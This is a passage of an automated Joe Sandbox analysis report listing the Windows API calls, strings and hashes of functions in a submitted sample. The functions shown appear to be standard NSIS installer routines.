                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                  • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                  • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                  • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                  • MulDiv.KERNEL32(00013600,00000064,?), ref: 00403295
                                                  • wsprintfW.USER32 ref: 004032A5
                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                  • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                  • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                  • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                  APIs
                                                  • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                  • wsprintfW.USER32 ref: 00404457
                                                  • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$@rD
                                                  • API String ID: 3540041739-1813061909
                                                  • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                  • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                  • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                  • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                  • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                  • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                  • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                  • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                  • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                  • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                  • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                  • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                  • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                  • GlobalFree.KERNEL32(006540A8), ref: 00402387
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 3376005127-0
                                                  • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                  • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                  • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                  • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                  • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                  • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                  • String ID:
                                                  • API String ID: 2568930968-0
                                                  • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                  • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                  • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                  • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                  APIs
                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                  • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                  • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                  • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                  • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                  • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                  • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                  APIs
                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                  • API String ID: 1697273262-1764544995
                                                  • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                  • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                  • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                  • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00404902
                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID: $@rD
                                                  • API String ID: 3748168415-881980237
                                                  • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                  • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                  • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                  • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                  APIs
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                    • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                  • String ID: CopyFiles "%s"->"%s"
                                                  • API String ID: 2577523808-3778932970
                                                  • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                  • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                  • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                  • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: lstrcatwsprintf
                                                  • String ID: %02x%c$...
                                                  • API String ID: 3065427908-1057055748
                                                  • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                  • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                  • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                  • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 00405057
                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                  • API String ID: 2266616436-4211696005
                                                  • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                  • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                  • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                  • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00402100
                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                  • String ID:
                                                  • API String ID: 1599320355-0
                                                  • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                  • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                  • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                  • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                  APIs
                                                    • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
